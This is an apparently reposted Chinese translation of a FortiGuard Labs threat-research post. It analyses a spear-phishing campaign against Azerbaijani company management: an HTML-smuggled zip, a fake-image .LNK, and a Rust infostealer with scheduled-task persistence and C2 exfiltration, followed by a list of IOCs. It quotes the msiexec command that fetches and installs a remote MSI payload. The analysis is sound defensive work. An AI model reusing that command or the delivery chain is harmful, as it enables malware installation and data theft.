历史短课
1923年,苏联在阿塞拜疆苏维埃社会主义共和国内创建了纳戈尔诺-卡拉巴赫自治州(州是一个行政区或省)。该州 95% 的人口为亚美尼亚人。1988年,纳戈尔诺-卡拉巴赫宣布打算离开阿塞拜疆并加入邻国亚美尼亚共和国。虽然苏联能够控制由此产生的紧张局势,但一旦苏联开始解体,阿塞拜疆和亚美尼亚之间就为控制纳戈尔诺-卡拉巴赫地区而爆发武装冲突。尽管两国于 1994 年和 2020 年暂时达成停火协议,但两国之间的紧张局势依然严重。
图 1. 区域地图
受影响平台: Microsoft Windows
受影响方:与阿塞拜疆公司相关的定向管理
影响:侦察目标用户的计算机基本信息
严重级别:低
鱼叉式网络钓鱼活动利用阿塞拜疆-亚美尼亚冲突
2023 年 8 月,FortiGuard Labs 发现了一份受感染的备忘录,假装来自阿塞拜疆一家公司的现任总裁,针对的是相关企业的管理团队。打开此备忘录会下载旨在从目标收集基本信息的恶意软件。
图 2. 备忘录
该博客分析了攻击链,审查了恶意软件的功能,并揭示了其背后的威胁行为者的可能位置。
攻击剖析
FortiGuard Labs 通过找到图 2 中的备忘录发现了这次攻击。该备忘录声称拥有有关阿塞拜疆和亚美尼亚士兵之间边境冲突的信息。
图 3. 攻击流程
该备忘录采用 HTML 格式,并使用HTML 走私自动传送受密码保护的存档。正如备忘录所示,该档案包含几张图像。如图 3 中的攻击图所示,存档包含三个干净映像和一个虚假映像。实际内容如下图所示。
图 4. zip 存档的内容,其中部分内容出于 PII 目的而被混淆
精明的观察者可能会注意到第一个“图像”不是图像文件。实际上,它是一个执行以下命令的 .LNK 快捷方式:
....WindowsSystem32msiexec.exe /i“https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0”此命令下载 .MSI(Microsoft 安装程序)文件。图 3 显示了该 MS 安装程序文件在单击时执行两个操作。第一个操作是显示与虚假图像快捷方式具有相同文件名的图像(如图 4 中的 zip 存档所示):
图 5. 执行 .LNK 快捷方式时显示的虚假图像
这种技术可能会欺骗一些用户,让他们认为快捷方式只是一个图像文件。但这是误导。相反,安装程序会同时将隐藏的恶意软件加载到目标计算机中。
恶意软件
恶意安装程序在用户的 %APPDATA% 文件夹中创建一个名为“ Windows Defender Health Check”的新文件夹。” 它还会安装同名的恶意软件:
C:Users[username]AppDataRoamingWindows Defender Health CheckWindowsDefenderHealthcheck.exe不常见的特征
该恶意软件是用 RUST 编程的,这并不是大多数恶意软件作者选择的编程语言。这使得使用标准分析工具和方法的用处有所减弱。使用 RUST 的事实已经使这个威胁行为者与众不同。然而,这并不是该恶意软件与众不同的唯一特征。
为了持久化,将创建一个名为“ 24rp.xml”的临时文件。” 该文件用于创建计划任务。
图 6. 计划任务
创建计划任务后,.XML 文件将被删除。该技术假设目标目标让计算机整夜处于开启状态,因此恶意软件可以在正常办公时间之外执行,这样就不太可能被注意到。此外,为了获得更大的隐蔽性,恶意软件可以在执行任务时休眠随机的时间。
图 7. 睡眠 10 到 20 分钟
接下来,我们将回顾图 2,了解该恶意软件如何试图保持隐藏的另一个指示。请注意,该备忘录的日期是 8 月 8日。通过检查其编译时间戳,我们发现该恶意软件是在前一天创建的。
图 8. 恶意软件的创建时间
如此短的时间范围使得在攻击开始之前几乎不可能意外释放恶意软件。
窃取信息
最终,该恶意软件就像一个信息窃取者,收集基本的计算机信息并将其发送到 C2 服务器。执行以下命令:
图 9. 恶意软件执行的命令
这些命令表明威胁行为者仍处于尝试完全破坏其目标的早期阶段。从这些命令收集的信息可用于为每个受感染的目标定制特定的攻击。
这个信息窃取程序是独一无二的,因为它还收集环境变量列表,并采取额外的步骤来检查正在使用的任何代理服务器。
图 10. 检查代理
如果设置了代理服务器,恶意软件就会了解如何路由其流量。该恶意软件发出 POST 请求,通过端口 35667 将其窃取的加密信息发送到威胁行为者 78[.]135.73.140 拥有的 C2 服务器。
追踪可能的威胁参与者
我们的遥测发现 C2 服务器本身没有什么太有趣的地方。然而,深入研究服务器发现了更多信息。使用 PDNS 和其他记录中的数据,C2 服务器 78[.]135.73.140 似乎不是共享服务器。这表明威胁行为者拥有对服务器的完全控制和设置。有了这个假设,我们就试图发现更多威胁行为者的网络基础设施。仅在 /24 子网内,就发现了另外四台服务器:
图 11. 部分网络基础设施
我们以备忘录上的 8 月 8日为起点,搜索了前一个月流向这些服务器的流量。虽然我们没有发现大量流量,但我们在哥伦比亚发现了一个 IP 地址,该地址在 7 月份通过常用于 VPN 的端口连接到服务器 78[.]135.73.188。如果威胁行为者想要隐藏他们的活动,使用他们控制下的 VPN 服务器就可以完成这项工作。哥伦比亚的 IP 地址属于一家移动公司,这表明用户可能一直在使用移动热点。如果是这样,这可能就是攻击者的位置。
结论
此活动中的威胁行为者使用了一些先进技术,包括 RUST 和下班后执行,以帮助其保持在雷达之下并使分析变得更加困难。网络基础设施的规模也表明该威胁行为者不是普通的恶意软件开发人员,而是有权访问资源的人。地缘政治规则的使用表明该威胁行为者已介入并知道如何针对特定用户。
文件 IOC
2A71BA3FEF819AB9FF3347CF71EEA37766B1E80FDBC1B53C83DD3B19CE71EBFD ARMENIAN_ACT_OF_AGGRESSION.pdf.html
17B3ACB560E979556207B8E7E41A086F6F147381E2FFD1CE672D663A526B1FB5 Armenian Aggression.zip
04725FB5A9E878D68E03176364F3B1057A5C54CCA06EC988013A508D6BB29B42 1.KARABAKH.jpg.lnk
35F2F7CD7945F43D9692B6EA39D82C4FC9B86709B18164AD295CE66AC20FD8E5 karabakh.jpg.msi
5327308FEE51FC6BB95996C4185C4CFCBAC580B747D79363C7CF66505F3FF6DB WindowsDefenderHealthcheck.exe网络 IOC
https://dl[.]dropboxusercontent[.]com/scl/fi/zjxgh8ofdmfca8bpfntw9/karabakh.jpg.msi?rlkey=nidpjpx3ioigoq6qonibztwg4&dl=0
78[.]135.73.140
78[.]135.73.147
78[.]135.73.162
78[.]135.73.183
78[.]135.73.188转载来源:https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia
图片来源网络侵权可联系删除
